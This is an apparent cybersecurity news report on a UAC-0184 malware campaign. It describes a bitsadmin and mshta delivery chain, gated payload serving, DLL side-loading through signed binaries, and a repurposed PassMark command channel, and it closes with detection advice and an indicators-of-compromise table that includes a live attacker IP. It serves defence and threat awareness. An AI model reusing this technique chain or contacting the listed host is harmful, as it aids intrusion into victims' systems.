UAC-0184 Malware Chain Uses bitsadmin and HTA Files for Gated
A newly documented attack chain, attributed to the threat group UAC-0184, is actively leveraging Windows’ built-in bitsadmin tool and HTA files for payload delivery. This sophisticated method allows...
A newly documented attack chain, attributed to the threat group UAC-0184, is actively leveraging Windows’ built-in bitsadmin tool and HTA files for payload delivery. This sophisticated method allows the adversary to compromise targeted systems with malicious software. For a deeper dive into this activity, a comprehensive report is available
The attackers use social engineering lures built around topics like criminal proceedings, combat videos, and personal contact requests to trick victims into opening malicious files.
Once a victim opens the booby-trapped document, whether it appears as a PDF, a Word file, or an Excel spreadsheet, bitsadmin quietly fetches an HTA file from an attacker-controlled remote server in the background.
That HTA file is then executed using mshta.exe, pushing the infection forward without raising any immediate alarms on the compromised machine.
Analysts at Synaptic Security said in a report shared with Cyber Security News (CSN) that the delivery mechanism appears gated, meaning the payload is only served to systems that pass certain filtering criteria, which likely helps screen out sandboxes and security researcher environments.
This kind of conditional delivery makes the malware significantly harder to study and allows the attackers to remain active without drawing unwanted attention for extended stretches of time.
The HTA file, once executed, runs a hidden PowerShell command that downloads a ZIP archive named dctrprraclus.zip from the attacker-controlled server at IP address 169.40.135.35.
UAC-0184 Malware Chain
The archive unpacks into a folder inside the AppData directory and launches two files side by side, a music visualizer application called Cluster-Overlay64.exe along with a decoy PDF named Scan_001.pdf.
The PDF is shown to the victim as a distraction while the real infection continues quietly and undetected in the background on their machine.
The broader toolset that UAC-0184 deploys reveals considerable operational sophistication. The final stage of the infection chain involves PassMark BurnInTest network components being repurposed as a covert command-and-control channel, listening on UDP port 31339 for multicast peer discovery traffic.
This abuse of a legitimate, Microsoft-signed software stack gives the attacker a convincing cover identity deep inside a trusted process tree.
The use of bitsadmin for downloading files is not new, but pairing it with HTA file execution is a deliberate technique that helps the attacker blend in with normal Windows background activity.
Bitsadmin is a native Windows command-line tool originally built for background file transfers, and its abuse by threat actors often goes unnoticed by both everyday users and many endpoint security products.
Once the HTA file executes, it drops a layered package containing Cluster-Overlay64.exe, openvr_api.dll, filter.bin, and kernel-diag.lib inside the ApplicationData32 folder. The actual malicious code is not sitting inside the main executable.
Instead it is buried inside DLL files and encoded local blobs, decrypted at runtime through a multi-stage process combining XOR operations with LZNT1 decompression.
The final payload is then side-loaded into VSLauncher.exe, a legitimate Microsoft-signed Visual Studio binary that wraps it in a trustworthy digital identity.
Signed Software Repurposed as a Cover Identity
One of the most striking aspects of this campaign is how aggressively the threat actor leans on legitimate, signed software to mask malicious behavior from defenders.
PassMark Endpoint, a genuine commercial network testing utility, becomes the final network-facing component, carrying capabilities including process memory dumping via MiniDumpWriteDump and peer data transfer over TCP port 31339.
Defenders are advised to monitor for bitsadmin and mshta.exe being used together, especially when paired with suspicious temporary file name patterns like ~tmp(…).hta.
Network teams should watch for UDP traffic toward 224.0.0.255 on port 31339, which is the PassMark multicast discovery address that this campaign repurposes for its own communication.
The presence of VSLauncher.exe running outside a legitimate Visual Studio installation path, or any unexpected file creation events inside %APPDATA%ApplicationData32, should be treated as serious warning signs that warrant immediate investigation by security teams.
Indicators of Compromise (IoCs):-
| Type | Indicator | Description |
|---|---|---|
| IP Address | 169.40.135.35 | Attacker-controlled C2 server hosting HTA files and payload archive |
| URL | hxxp://169.40.135.35/dctrpr/slippersuppity.hta | HTA stage-1 payload URL (PDF lure variant) |
| URL | hxxp://169.40.135.35/dctrpr/basketpast.hta | HTA stage-1 payload URL (Word document lure variant) |
| URL | hxxp://169.40.135.35/dctrpr/agentdiesel.hta | HTA stage-1 payload URL (Excel lure variant) |
| URL | hxxp://169.40.135.35/dctrprraclus.zip | Payload ZIP archive download URL |
| SHA-256 | 81d93004a02a455af01b0f709e34d5134108ec350f9391dc0f91a00a54998590 | ZIP archive (dctrprraclus.zip) |
| SHA-256 | dc6cddc391b373b18f105f49a80ff83d53b430d8dea35c1f1576832fa9fbd2b3 | kernel-diag.lib (encoded payload loader) |
| SHA-256 | f5ca9c53d1537142889d7172c6643e886b2164233b91f0fc2d41ca010f035372 | filter.bin (XOR-encrypted secondary payload) |
| SHA-256 | df6942dc1a89226359adf1aac597c3b270f4a408214b4f7c2083f9524605e0f7 | openvr_api.dll (DLL sideload component) |
| SHA-256 | b811f28b844eff8c1f4f931639bed5bcc41113364fdfc44d7703259457839edb | input.dll (PassMark Endpoint sideloaded payload) |
| SHA-256 | 33e44dea247eaa8b0fc8ed1f8ed575905f6ce0b7119337ddd29863bbb03288b3 | PE_08 / SqlExpressChk.exe (bundled PE component) |
| File Path | %APPDATA%ApplicationData32Cluster-Overlay64.exe | Dropped music visualizer used as sideload host |
| File Path | %APPDATA%ApplicationData32openvr_api.dll | Dropped DLL containing loader logic |
| File Path | %APPDATA%ApplicationData32filter.bin | Dropped XOR-encrypted payload blob |
| File Path | %APPDATA%ApplicationData32kernel-diag.lib | Dropped DWORD-XOR encoded loader blob |
| File Path | %windir%SysWOW64input.dll | PassMark Endpoint DLL dropped for sideloading |
| File Path | %windir%SysWOW64VSLauncher.exe | Microsoft-signed sideload host (Visual Studio Version Selector) |
| Network | 224.0.0.255:31339 (UDP) | PassMark BurnInTest multicast discovery, repurposed for C2 peer discovery |
| Network | 31339/tcp | BurnInTest peer data channel, repurposed for C2 data transfer |
| File Name Pattern | ~tmp(…).hta | Temporary HTA file pattern written to %TEMP% during initial execution |
Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.
Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.
No Comment! Be the first one.